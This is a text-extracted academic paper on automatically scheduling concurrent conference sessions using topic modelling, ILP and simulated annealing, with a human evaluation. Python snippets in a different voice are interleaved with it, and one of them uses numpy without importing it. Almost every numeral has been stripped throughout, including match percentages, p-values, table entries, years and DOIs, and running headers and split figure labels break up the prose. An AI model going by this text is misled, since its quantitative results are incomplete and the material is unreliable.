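def kruskal_clusters(similarity, x):
    # similarity: symmetric pairwise talk similarity matrix; x: target number of clusters
    q = similarity.shape[0]
    parent = list(range(q))                 # union-find: each talk starts as its own cluster

    def find(a):
        while parent[a] != a:
            parent[a] = parent[parent[a]]   # path compression
            a = parent[a]
        return a

    # edges (talk pairs) sorted from highest to lowest similarity
    pairs = [(similarity[a, b], a, b) for a in range(q) for b in range(a + 1, q)]
    pairs.sort(reverse=True)

    n_clusters = q
    for _, a, b in pairs:
        if n_clusters == x:
            break
        ra, rb = find(a), find(b)
        if ra != rb:                        # merge only if the two talks are in separate clusters
            parent[rb] = ra
            n_clusters -= 1

    clusters = {}
    for talk in range(q):
        clusters.setdefault(find(talk), []).append(talk)
    return list(clusters.values())

sim = np.random.default_rng(4).random((10, 10))
sim = (sim + sim.T) / 2                     # make the toy matrix symmetric
print(kruskal_clusters(sim, x=3))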
we choose as the attractor the talk that has the highest similarity to all other talks in its cluster. if there are multiple talks qualify as attractors, one of them is chosen randomly. we calculate a fit score (f) for each talk $t_j$ in cluster $x_i$ as follows:

$f(t_j, x_i) = \max_{k=1,\ldots,T_{x_i},\; k \neq j} s(t_j, t_k)$ ( )

where $T_{x_i}$ is the number of talks in cluster $x_i$. the talk $t_j$ with the maximum value of f is chosen as the attractor for cluster $x_i$. this list of attractors is then input to the ilp, which optimally assigns one attractor to each concurrent session in the schedule and assigns talks to sessions so as to maximize the sum of similarities between the attractor and all the other talks in that session. in addition, the ilp requires the following constraints: each session is assigned no more than tmax talks, exactly ci attractors must be assigned to each timeslot ni, and each talk must be assigned to only one session. we made no effort to ensure distinctness of the initial schedules either within or between the three approaches.

stochastic optimization
we developed two variants each of a hill climbing algorithm and a simulated annealing algorithm to further improve upon the initial schedules (obtained from the random, greedy, and ilp approaches) by iteratively proposing swaps in the positions of talks in the schedule. the hill climbing (hc) approaches accept solutions from a swap only when they increase the discrimination ratio, and are thus susceptible to being trapped in local optima. by contrast, the simulated annealing (sa) approaches will accept solutions that decrease d with a certain probability, and thus have the potential to escape local optima (kirkpatrick, gelatt & vecchi, ). each optimization algorithm takes one or more initial schedules as input and spawns r parallel optimization runs to produce r optimized schedules at the end of execution. if the input schedule is random, each parallel run starts with an independently generated schedule, while if the input schedule is a greedy or an ilp schedule, all parallel runs operate on the same input. the schedule with the highest discrimination ratio among the r optimized schedules is chosen as the output of the algorithm. the input parameters to the optimization approaches are given in 'preliminaries'.

simulated annealing
for simulated annealing, we used the kirkpatrick acceptance probability function (eq. ( )) to determine the probability of accepting a solution resulting from a swap (kirkpatrick, gelatt & vecchi, ):

$k(d_j, d_i) = \begin{cases} 1 & \text{if } d_j < d_i \\ e^{-(d_j - d_i)/z_i} & \text{otherwise} \end{cases}$ ( )

where $d_i$ and $d_j$ are the discrimination ratios of the schedule under the proposed swap and after the last accepted swap, respectively; z is the initial 'temperature', and $z_i$ is the current temperature at timestep i, defined as $z_i = z_{i-1}\,\alpha$.
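a sketch of this acceptance rule together with a minimal annealing loop built around it; the geometric cooling form, the stand-in objective, and the flat list-of-sessions schedule below are illustrative assumptions (in the paper the objective being maximized is the discrimination ratio d, and the full algorithms are given as pseudocode later):

import math
import random

def acceptance_probability(d_last_accepted, d_proposed, temperature):
    # kirkpatrick rule: accept an improvement in d outright, otherwise accept with a
    # probability that shrinks as the drop in d grows or as the temperature falls
    if d_last_accepted < d_proposed:
        return 1.0
    return math.exp(-(d_last_accepted - d_proposed) / temperature)

def anneal(schedule, objective, max_swaps=5000, z0=1.0, alpha=0.999, seed=0):
    rng = random.Random(seed)
    current = [list(s) for s in schedule]              # flat list of sessions of talk indices
    current_score = objective(current)
    best, best_score = [list(s) for s in current], current_score
    z = z0
    for _ in range(max_swaps):
        s1, s2 = rng.randrange(len(current)), rng.randrange(len(current))
        i1, i2 = rng.randrange(len(current[s1])), rng.randrange(len(current[s2]))
        current[s1][i1], current[s2][i2] = current[s2][i2], current[s1][i1]      # propose a swap
        new_score = objective(current)
        if rng.random() < acceptance_probability(current_score, new_score, z):
            current_score = new_score
            if new_score > best_score:                 # keep the best schedule ever seen
                best, best_score = [list(s) for s in current], new_score
        else:
            current[s1][i1], current[s2][i2] = current[s2][i2], current[s1][i1]  # undo the swap
        z *= alpha                                     # z_i = z_{i-1} * alpha
    return best, best_score

sessions = [[0, 7, 2], [3, 1, 5], [6, 4, 8], [9, 10, 11]]
toy_objective = lambda sched: -sum(abs(t - 3 * s) for s, sess in enumerate(sched) for t in sess)
print(anneal(sessions, toy_objective, max_swaps=2000))

the hill-climbing variants correspond to replacing the acceptance rule with 'accept only strict improvements', and the parallel-runs policy amounts to calling a loop like this with r different seeds and keeping the highest-scoring result.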
in order to emulate this aspect of human scheduling, we developed variants of the hc and sa approaches that split the optimization algorithm into two sequential regimes, the first optimizing for within-session similarity alone and the second for between-session disparity alone. between-session disparity is optimized by proposing a swap of two randomly selected sessions in each iteration. this has no effect on within-session similarity since swapping is conducted on sessions and not talks. the sequential optimization regimes are stopped when further swapping does not result in improvement. we refer to the versions of the hc and sa approaches in which d is optimized directly throughout as hca and saa, respectively, and the approaches in which the schedule is first optimized for within-session similarity as hcb and sab, respectively. see algorithms – for pseudocode describing the four optimization approaches. scheduling constraints in practice, a conference will typically have constraints that restrict the sessions or timeslots a talk can be placed in. reasons may include talks competing for awards that must scheduled early in the conference in order to allow time for judging; presenters with multiple talks that cannot be scheduled in concurrent sessions within the same timeslot; presenters who are scheduled to arrive at the conference after it begins or before it is finished; or requests for complementary talks to be scheduled in the same session. these constraints can be accommodated by the optimization approaches described above by requiring them to be satisfied in any solution obtained. in our implementation, such scheduling constraints were encoded as a dictionary (l) that maps each talk to a set of sessions in which the talk can be placed without violating any scheduling constraints. for example, in a schedule with five sessions (labeled through ), if a constraint prevents talk ti from being scheduled in session , the constraint would be encoded in the dictionary as l[ti]={ , , , }. each proposed swap was checked for constraint violations before being accepted. if there is no feasible solution due to conflicting constraints, no solution is returned. results the datasets for the two conferences used in this work, ecology and evolution , are summarized in table . we first tested our topic modeling, schedule creation and optimization approaches on select concurrent sessions from ecology . the manually created schedule for this conference gave us a point of comparison for the automated schedules we generated. although our ultimate goal was to apply our methods to the manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table parameters for the ecology and evolution conferences. parameter ecology evolution number of days (w) number of talks to be scheduled (q) , number of timeslots (n) maximum number of concurrent sessions per timeslot (cmax) (w ,w ,w ), (w ) maximum number of talks per session (tmax) scheduling constraints to be accommodated none evolution conference, previous evolution conferences could not be used for testing since talk abstracts were not a part of submissions in previous years. the main structural difference between the two datasets is that no scheduling constraints were available for ecology . 
algorithm : hill climbing optimization algorithm (hca) input: initial schedule output: optimized schedule set current schedule to input schedule; set e to maximum number of swaps; while discrimination ratio (d) increases or e > do select two talks from the current schedule at random; swap the two talks; if updated schedule does not violate constraints then compute d of updated schedule; if updated d > current d then accept changes; set current schedule to updated schedule; end else discard changes; end e=e− ; end return current schedule; manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm : hill climbing optimization algorithm (hcb) input: initial schedule output: intra-session optimized schedule set current schedule to input schedule; set e to maximum number of swaps; while mean intra-session similarity (sw) increases or e > do select two talks from the current schedule at random; swap the two talks; if updated schedule does not violate constraints then compute sw of updated schedule; if updated sw > current sw then accept changes; set current schedule to updated schedule; end else discard changes; end e=e− ; end set intra-session optimized schedule to current schedule; input: intra-session optimized schedule output: optimized schedule set e to maximum number of swaps; set current schedule to input schedule; while mean inter-session similarity (sb) decreases or e > do select two sessions from the input schedule at random; swap the two sessions; if updated schedule does not violate constraints then compute sb of updated schedule; if updated sb < current sb then accept changes; set current schedule to updated schedule; end else discard changes; end e=e− ; end return current schedule ; manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ecology topic models were created using the lda algorithm for , , , and topics on the corpus of talks. each topic model was evaluated based on two criteria: ( ) match percentage and ( ) manual examination of the topics and topic words associated with each talk. we obtained match percentages of . % (for topics), . % ( ), . % ( ) and % ( ). the topic model with topics was judged to be the best model for the data. subsequently, this topic model was used to compute a talk similarity matrix that contained a similarity score for all pairs of talks in the dataset. the talk similarity matrix was computed using cosine similarity between the topic relevance vectors of any two talks (eq. ( )). algorithm : simulated annealing optimization algorithm (saa) input: initial schedule output: optimized schedule set e to maximum number of swaps; set best d to d of input schedule; set current schedule, best schedule to input schedule; while discrimination ratio (d) increases or e > do select two talks from the input schedule at random; swap the two talks; if updated schedule does not violate constraints then compute d of updated schedule; compute probability of accepting updated schedule using kirkpatrick accep- tance probability function; r=random number between and ; if acceptance probability > r then accept changes; set current schedule to updated schedule; compute d of updated schedule; if updated d > current d then set best schedule to updated schedule end else discard changes; end else discard changes; end e=e− ; end return best schedule; manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
algorithm : simulated annealing optimization algorithm (sab) input: initial schedule output: optimized schedule set e to maximum number of swaps; set best sw to sw of input schedule; set current schedule, best schedule to input schedule; while mean inter-session similarity (sw) increases or e > do select two talks from the current schedule at random; swap the two talks; if updated schedule does not violate constraints then compute sw of updated schedule; compute probability of accepting updated schedule using kirkpatrick acceptance probability function; r=random number between and ; if acceptance probability > r then accept changes; set current schedule to updated schedule; if updated sw > best sw then best sw = updated sw; best schedule = updated schedule; end else discard changes; end else discard changes; end e=e− ; end set intra-session optimized schedule = best schedule; input: intra-session optimized schedule output: optimized schedule set e to maximum number of swaps; set current schedule, best schedule to input schedule; set best sb to sb of input schedule; while mean inter-session similarity (sb) decreases or e > do select two talks from the current schedule at random; swap the two talks; if updated schedule does not violate constraints then compute sb of updated schedule; compute probability of accepting updated schedule using kirkpatrick acceptance probability function; r= -(random number between and ); if acceptance probability > r then accept changes; set current schedule to updated schedule; if updated sb < best sb then best sb = updated sb; best schedule = updated schedule; end else discard changes; end else discard changes; end e=e− ; end return best schedule; manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. random manual greedy ilp schedule creation algorithm m e a n d is c ri m in a ti o n ra ti o starting schedules hca saa hcb sab figure mean discrimination ratio of the starting and final ecology schedules for the four opti- mization approaches applied to each of the random, manual, greedy, and ilp initial schedules. error bars show two standard errors of the mean discrimination ratio among the starting or final schedules. full-size doi: . /peerjcs. /fig- fifty each of random, greedy, and ilp schedules were created in addition to the manually created ecology schedule. the schedule with the highest discrimination ratio among the runs was taken to be the solution for each combination of starting schedule and stochastic optimization algorithm. the discrimination ratios of the initial and final optimized schedules are shown in fig. . both the greedy and ilp initial schedules outperformed the manual schedule while the random schedule did not. all four optimization approaches improved upon the initial schedules. the highest relative improvement was seen on the random schedules (about eight-fold) while a two-fold improvement was seen relative to the other three initial schedules, yet the final schedules had very similar discrimination ratios irrespective of the initial schedule. among the optimization approaches, the overall best results were obtained with saa, closely followed by hca, on all initial schedules. thus, the two approaches optimizing directly and continuously for d outperformed those that sequentially optimized for within-session similarity followed by between-session disparity. 
we compared the d distributions using a student’s t-test across final schedules created hc and sa approaches with different initial schedules to investigate if there are any significant differences in performances. we found statistically significant differences between sa and hc versions for the majority of starting schedules at the bonferroni- corrected threshold of α= . (table , rows – ). no significant differences were found between hca and saa with a random starting schedule and between hcb and sab with an ilp starting schedule (table , rows , ). we also compared the performance of a and b versions of the hc and sa approaches with the four initial schedules. statistically significant differences were found between a manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table comparison of hc and sa approaches, and, a and b variants of hc and sa with four differ- ent initial schedules. comparisons are made on the distributions of d for the final ecology opti- mized schedules produced by each approach. shown are p-values from two-sided un-paired t-tests at the bonferroni-corrected threshold of α= . (experiment-wide α= . for n= ). initial schedule comparison p comparing hc with sa versions random hca vs. saa . manual hca vs. saa . e− greedy hca vs. saa . e− ilp hca vs. saa . random hcb vs. sab . e− manual hcb vs. sab . e− greedy hcb vs. sab . e− ilp hcb vs. sab . comparing a with b variants random hca vs. hcb . e− manual hca vs. hcb . e− greedy hca vs. hcb . e− ilp hca vs. hcb . e− random saa vs. sab . e− manual saa vs. sab . e− greedy saa vs. sab . e− ilp saa vs. sab . e− and b versions for both hc and sa approaches across all four starting schedules (table , rows – ). evolution topic models were created from the corpus of , talks using the lda algorithm for , , , and topics. we obtained match percentages of . % (for topics), . % ( ), . % ( ) and . % ( ). based on the match percentage of the four models and manual inspection of the generated topics, the model with topics was chosen to compute talk similarity for the evolution corpus. during the test runs conducted on the ecology dataset, we observed that there was little variation between different parallel runs within the same algorithm (fig. ). knowing this, and considering the larger size of the evolution dataset, we reduced the number of parallel runs for each optimization algorithm to . since the ecology results showed that the initial schedule had no discernible affect on the final optimized schedule, we only report the results of optimization on random starting schedules with and without constraints. the results are shown in fig. . the relative ordering of the approaches is identical to ecology , with the highest performance shown by saa followed closely by hca. interestingly, the inclusion of constraints did not lead to a reduction in the discrimination ratios; in fact, the highest discrimination ratio ( . ) was obtained in the presence of constraints. manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. no constraints with constraints schedule creation algorithm m e a n d is c ri m in a ti o n ra ti o starting schedules hca saa hcb sab figure mean discrimination ratio of starting and optimized evolution schedules for the four optimization approaches applied to random initial schedules with and without constraints. 
error bars show two standard errors of the mean discrimination ratio among the starting or final schedules.

table: comparison of hc and sa approaches, and of the a and b variants of hc and sa, with different initial schedules. comparisons are made on the distributions of d for the final evolution optimized schedules produced by each approach. shown are p-values from two-sided unpaired t-tests at the bonferroni-corrected threshold of α = . (experiment-wide α = . with n = ).
    initial schedule            comparison       p
    comparing hc with sa versions
    random                      hca vs. saa      . e−
    random                      hcb vs. sab      . e−
    random with constraints     hca vs. saa      . e−
    random with constraints     hcb vs. sab      . e−
    comparing a with b variants
    random                      hca vs. hcb      . e−
    random with constraints     hca vs. hcb      . e−
    random                      saa vs. sab      . e−
    random with constraints     saa vs. sab      . e−

we compared the d distributions using a student's t-test across final schedules created by the hc and sa approaches with a random initial schedule. statistically significant differences were found between sa and hc versions with a random initial schedule both with and without additional scheduling constraints (table , rows – ). we also compared the performance of the a and b variants of the hc and sa approaches. statistically significant differences were found between the a and b versions for both hc and sa approaches both with and without scheduling constraints (table , rows – ).
preliminary labels can be generated for the automated sessions using information from the topic model. for example, for each talk in a session, we can determine the top two words from the top two relevant topics that best describe the talk. this would result in a set of four words (assuming no redundancies) that represent each talk. the most frequently occurring words among the talks can be used to create a preliminary label, which can then be used to construct a session name by program organizers.

manual modification of evolution schedule
the saa schedule with constraints, reported above, was then given to the evolution program committee as a starting point. the program committee consisted of ten evolutionary biologists. based on their subjective judgments, and following manual procedures that elude easy description, the committee members made a large number of changes to the placement of talks and sessions before finalizing the schedule for the conference. in addition, the program committee added extra sessions for special symposia that were not part of the pool of contributed talks. the changes made by the program committee were substantial; . % of talk pairs that shared a session in the automated schedule were retained within the same session in the modified schedule, while . % of talk pairs placed in concurrent sessions in the modified schedule had originally been placed together in the automated schedule. the value of d for the original automated schedule was . , while that for the manually modified schedule was . .

expert evaluation
the differences between the automated and manually modified evolution schedule provided an opportunity to conduct a human evaluation. we were particularly interested in comparing how tempted users would be to hop between sessions in each case.
to that end, we presented a set of volunteers with expertise in evolutionary biology, none of whom served on the program committee, with faux schedules compiled from the two different sources. responses were captured via an online survey (university of north carolina at chapel hill institutional review board - ). the respondents, recruited individually, included twenty-four early career researchers (graduate students and postdoctoral associates) and five faculty. respondents were presented with one of eight faux schedules. each schedule consisted of two timeslots. first, two timeslots each were randomly selected from the automated schedule and the manually modified schedule. these were then combined to produce all eight possible schedules consisting of one timeslot from the automated schedule and one from the modified schedule (fig. ). each timeslot contained concurrent sessions, and each session had a maximum of five talks. each respondent was randomly assigned one of the faux conference schedules and a corresponding book of abstracts. testing was blind in the sense that respondents were aware of the purpose of the study but not of which timeslot originated from which source (automated or manual). the survey contained two groups of questions. first, we asked respondents to select the five talks they would like to attend within each timeslot, regardless of whether they were assigned to the same session. we could then compare the automated or modified timeslots with respect to how the selected talk pairs were grouped into common sessions.

figure: generation of faux schedules for human evaluation. (a) the original automated and manually modified schedules are depicted here for purposes of illustration with six timeslots each. (b) two timeslots from each schedule in (a) are randomly selected. (c) the eight possible schedules consisting of one each of the automated and modified timeslots.

secondly, we asked respondents to choose one session to attend in its entirety in each timeslot and report on the difficulty of finding a session where all the talks interested them. responses were scored on a likert scale of one to five with one being "very difficult" and five being "very easy". these responses could then be used to compare the topical coherence of the sessions from the automated and modified schedules. if either of the schedules (automated or modified) was more effective than the other at capturing the topics of relevance to our sample of mock conference attendees, we would expect to see respondents (a) select more talks in the same session(s) and (b) select higher values on the likert scale for timeslots from that schedule. with respect to (a), we found no significant difference in the number of same-session talk pairs between the automated and manual timeslots (unpaired t-test t = − . , p = . , n = ). with respect to (b), the responses for the automated and manually modified timeslots were quite similar in distribution (fig. ). the mode for the automated timeslots was four while that for the modified timeslots was three. two respondents rated the selection "very easy" for the modified timeslot while none did for the automated one. while the expert evaluation does not reveal substantial differences between the automated and manually modified schedule in terms of preference by the survey takers, the limited size of the survey should be noted.
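the pair-based overlap and the unpaired t-test used in this evaluation are straightforward to compute; the sketch below shows one way to do both in python. it is illustrative only: the schedule representation (a list of sessions, each a set of talk ids) and the respondent counts are hypothetical placeholders, while scipy.stats.ttest_ind performs the two-sided unpaired test.

from itertools import combinations

from scipy import stats

def same_session_pairs(schedule):
    # schedule: list of sessions, each an iterable of talk ids
    pairs = set()
    for session in schedule:
        pairs.update(frozenset(p) for p in combinations(sorted(session), 2))
    return pairs

def pair_retention(schedule_a, schedule_b):
    # fraction of same-session talk pairs in schedule_a that are still
    # placed in a common session in schedule_b
    a = same_session_pairs(schedule_a)
    b = same_session_pairs(schedule_b)
    return len(a & b) / len(a) if a else 0.0

# hypothetical per-respondent counts of selected talk pairs that fell into the
# same session, for the automated and the manually modified timeslot
automated_counts = [3, 2, 4, 1, 2]   # placeholder values
modified_counts = [2, 3, 3, 2, 1]    # placeholder values
t_stat, p_value = stats.ttest_ind(automated_counts, modified_counts)  # two-sided, unpaired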
discussion
manual scheduling of conferences is complicated, time intensive, and may often result in a suboptimal schedule with sessions that could be more topically coherent and timeslots in which sessions could be more topically disparate. here, we have proposed and tested a strategy for automating the conference scheduling problem. in our approach, we first use topic modeling to identify latent topics and use the resulting weight vectors to measure similarity among talks and sessions. stochastic optimization is then used to generate schedules according to the discrimination ratio, which simultaneously quantifies within-session coherence and between-session disparity. in a comparison of different approaches for generating starting schedules and improving upon them, we found that integer linear programming produced the best starting schedule, but that further stochastic optimization greatly improved upon the solution found by ilp.

figure: responses of mock conference attendees when asked to rate the ease or difficulty of selecting a single session when presented with faux schedules containing one timeslot each from the automated and manually modified evolution schedules. the scale ranges from one (very difficult) to five (very easy).

we attribute the inability of ilp to maximize the discrimination ratio to the heuristic compromise of splitting the problem into smaller sub-problems, which was necessitated by the size of the real-world problem instances. we also found that the initial schedule had little to no effect on the discrimination ratio of the final schedule. thus, we recommend using a random or greedy algorithm to generate the starting schedule, since these approaches are less computationally expensive and easier to implement. we found that simulated annealing performed better than naive hill climbing as a stochastic optimization strategy. if the results we obtained for the ecology dataset are representative, and we accept that the discrimination ratio is a reasonable objective function, then it appears that manually generated schedules can be far from optimal. this could be due to a number of reasons, apart from the obvious explanation that the combinatorial space of possible schedules is too large for humans to effectively search and evaluate. we cannot exclude that human conference organizers weigh additional factors (e.g., aiming for presenters within a session to represent a mix of different career stages). we would expect some difference between human perception of talk similarity and the inference of the same based on a topic model. and we would also expect a difference in how humans weigh coherence within sessions and disparity between sessions. in fact, we did receive feedback from evolution organizers that we should consider coherence first and disparity second. however, we saw that schedules produced in this way were inferior as judged by the discrimination ratio, although we do not know if they would be judged inferior by humans. this might be due to the way the algorithm operates—optimizing coherence within sessions first without regard to disparity between concurrent sessions. once the coherence within sessions has been optimized, the algorithm is not allowed to change the placement of talks in sessions to maximize disparity but can only
change the placement of the concurrent sessions with respect to each other. this results in a smaller search space for increasing disparity between concurrent sessions, which might lead to lower d scores for schedules produced using these approaches.
scheduling constraints are a regular feature of conferences, and initially we anticipated that they would be more troublesome than they ultimately proved to be. we found no decrease in discrimination ratio when incorporating constraints in the evolution schedule. we hypothesize that the applied scheduling constraints were not restrictive enough to substantially limit the search space. for context, while approximately % of the talks had scheduling constraints, the majority could still be placed in % of sessions. in cases where constraints are more restrictive, one could modify the approach here to accept solutions that minimize the number of constraints violated, or weight the constraints such that solutions aim to minimize the total weight of violated constraints.
with the evolution schedule, we took advantage of the opportunity to conduct a preliminary investigation into how much session-hopping users felt would be necessary in the automated schedule versus the manually modified one. by the two measures we looked at, prospective conference goers with expertise in the field found the two schedules to be comparable. given the substantial changes made to the automated schedule, it was perhaps surprising that the results did not show greater differences. one possible interpretation of this result is that while the conference organizers may have modified the schedule in an effort to optimize their own subjective similarity and disparity measures, they did not improve upon the automated schedule from the perspective of a community of conference attendees with diverse interests. this also suggests that it would be reasonable for future conference organizers to use an automated schedule as is, without expending additional human effort vainly trying to improve upon it. however, a number of limitations with this experiment should be noted. the sample size was small and a limited array of schedules was presented for evaluation. while all survey participants had expertise in some area of evolutionary biology, we might have been asking them to evaluate sessions outside of their specific interests. and they were tested in an artificial setting; their behavior in navigating a real conference schedule may differ.
taken together, we believe this work makes a number of contributions. first, topic modeling provides a reasonable input for automated clustering of conference abstracts. the scalability of this approach is attractive for large conferences. second, d is a reasonable objective function, though a difficult one for humans to manually optimize. its value lies in capturing both similarity within and dissimilarity between sessions, the latter of which has been previously neglected. third, we have identified fast heuristics for optimizing d.

future work
would it be possible to improve upon this approach such that an automated schedule would be preferred by a future organizing committee to a manually generated, or manually modified, schedule? one area for potential improvement would be to customize the weights given to topics based on their perceived importance to conference attendees. in the approach described here, each topic received equal weight.
however, a community of scientists may manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. consider some topics more important than others. values for the weights could be gathered by means of a survey or other user-contributed data. if topics were mapped to an ontology, weights related to the information content of topics could provide an indirect measure of importance (resnik, ) without the need for a survey. given the comparable performance of the automated and manually modified evolution schedules, it would be of interest to further examine how well statistical measures of topic similarity between talks match human perception. for similarity measures that do match well, it would then be of interest to see how sensitive humans are to schedules with very different levels of d, or to independently varying levels of similarity within sessions and dissimilarity between sessions. another pair of factors not considered was co-author and co-citation networks. intuitively, talks that are closely linked in either kind of network may be similar in ways that are somewhat independent of how they are related by the topic model (yan & ding, ). use of such network information could also help ensure that talks by individuals with strong intellectual ties are assigned to the same session or at least not assigned to different concurrent sessions. our implementation limits concurrent sessions to those that overlap fully. conferences sometimes schedule sessions of differing lengths that partially overlap with one another, and accommodating this in future versions could allow for greater flexibility. the heuristic approaches presented here have not been evaluated with respect to an exact approach with an optimality guarantee. future work may consider developing exact approaches, such as mixed-integer linear programming, to better understand the computational bounds of these approaches and investigate if the heuristics proposed here are substantially faster as compared to exact approaches and if the solutions are comparable. conclusions automated scheduling of large conferences is a problem of great interest and utility to scientists across various domains. here, we presented heuristic algorithms for the creation and optimization of conference schedules with concurrent sessions based on an objective function. the methods presented here are capable of ‘‘reading’’ conference talks, assessing similarities between the talks, and using those similarities to populate conference sessions. while these methods are a step forward in the field of automated conference scheduling, further work is needed to develop objective functions that accurately reflect user perception of ‘‘good’’ conference schedules. data and software availability data and software for this work are available at https://doi.org/ . /zenodo. . acknowledgements we wish to thank j scott provan for his guidance on implementing the ilp schedule creation approach. we thank the evolution program committee (j cryan, e lacey, manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. k pfennig, b langerhans, c mcclain, b o’meara, a rodrigo, m servedio, j shaw and j thorne) for their time and expertise in preparing the final evolution schedule from our automated preliminary schedule. we thank our survey participants who enabled us to enable comparisons of the automated and manual schedules. 
finally, we extend our thanks to christian santiago, daphne klotsa, david egolf, itai cohen, john crocker, karen daniels, michelle driscoll, and peter olmsted from the american physical society for providing pictures of preparing the schedule for their meeting. additional information and declarations funding this work was supported by the national evolutionary synthesis center and the national science foundation through ef- and dbi- . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national evolutionary synthesis center and the national science foundation: ef- , dbi- . competing interests todd j. vision is an academic editor for peerj. katherine lamm is employed by roi revolution, inc. author contributions • prashanti manda conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • alexander hahn performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, approved the final draft. • katherine beekman conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, approved the final draft. • todd j. vision conceived and designed the experiments, contributed reagents/material- s/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the university of north carolina at chapel hill granted irb approval for a survey conducted as part of this study (irb - ). manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: data and software for this work are available at zenodo: manda, prashanti, hahn, alexander, lamm, katherine, & vision, todd. ( , may ). avoiding ’’conflicts of interest’’: a computational approach to scheduling parallel conference tracks and its human evaluation - data and software. zenodo. http://doi.org/ . /zenodo. . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references andré p, zhang h, kim j, chilton l, dow sp, miller rc. . community clustering: leveraging an academic crowd to form coherent conference sessions. in: first aaai conference on human computation and crowdsourcing. bhardwaj a, kim j, dow s, karger d, madden s, miller r, zhang h. . attendee- sourcing: exploring the design space of community-informed conference scheduling. in: second aaai conference on human computation and crowdsourcing. blei dm, lafferty jd. . correlated topic models. in: proceedings of the th interna- tional conference on neural information processing systems. – . blei dm, ng ay, jordan mi. . latent dirichlet allocation. journal of machine learning research : – . bosch r, trick m. . integer programming. in: search methodologies. boston: springer, – . celebi me, kingravi ha, vela pa. . 
a comparative study of efficient initialization methods for the k-means clustering algorithm. expert systems with applications ( ): – doi . /j.eswa. . . . chang j, blei dm. . relational topic models for document networks. in: interna- tional conference on artificial intelligence and statistics. – . chang j, gerrish s, wang c, boyd-graber jl, blei dm. . reading tea leaves: how humans interpret topic models. in: advances in neural information processing systems. – . chilton lb, kim j, andré p, cordeiro f, landay ja, weld ds, dow sp, miller rc, zhang h. . frenzy: collaborative data organization for creating conference sessions. in: proceedings of the nd annual acm conference on human factors in computing systems. – . edis e, edis rs. . an integer programming model for the conference timetabling problem-konferans çizelgeleme problemi için bir tamsayili programlama modeli. celal bayar Üniversitesi fen bilimleri dergisi ( ): – . eglese r, rand g. . conference seminar timetabling. journal of the operational research society ( ): – doi . /jors. . . manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /jors. . http://dx.doi.org/ . /peerj-cs. fox c. . a stop list for general text. in: acm sigir forum, vol. . new york: association for computing machinery, – . gay dm, kernighan bw. . ampl: a modeling language for mathematical program- ming. duxbury-thomson : – . gonzalez tf. . clustering to minimize the maximum intercluster distance. theoreti- cal computer science : – doi . / - ( ) - . gulati m, sengupta a. . tracs: tractable conference scheduling. in: proceedings of the decision sciences institute annual meeting (dsi ). – . hillis dm. . evolution : the good, the better, and the future. available at http: //treethinkers.org/evolution- -the-good-the-better-and-the-future/ . houlding b, haslett j. . scheduling parallel conference sessions: an application of a novel hybrid clustering algorithm for ensuring constrained cardinality. journal of applied statistics ( ): – doi . / . . . ibrahim h, ramli r, hassan mh. . combinatorial design for a conference: con- structing a balanced three-parallel session schedule. journal of discrete mathematical sciences and cryptography ( ): – doi . / . . . kim j, zhang h, andré p, chilton lb, bhardwaj a, karger d, dow sp, miller rc. . cobi: community-informed conference scheduling. in: first aaai conference on human computation and crowdsourcing. kirkpatrick s, gelatt cd, vecchi mp. . optimization by simulated annealing. science ( ): – doi . /science. . . . kruskal jb. . on the shortest spanning subtree of a graph and the traveling salesman problem. proceedings of the american mathematical society ( ): – doi . /s - - - - . le page y. . optimized schedule for large crystallography meetings. journal of applied crystallography ( ): – doi . /s . lovins jb. . development of a stemming algorithm. mit information processing group, electronic systems laboratory. nicholls m. . a small-to-medium-sized conference scheduling heuristic incorporat- ing presenter and limited attendee preferences. journal of the operational research society ( ): – doi . /palgrave.jors. . porter m. . snowball: a language for stemming algorithms. available at https:// tartarus.org/martin/porterstemmer/index.html. porter mf. . an algorithm for suffix stripping. program ( ): – doi . /eb . 
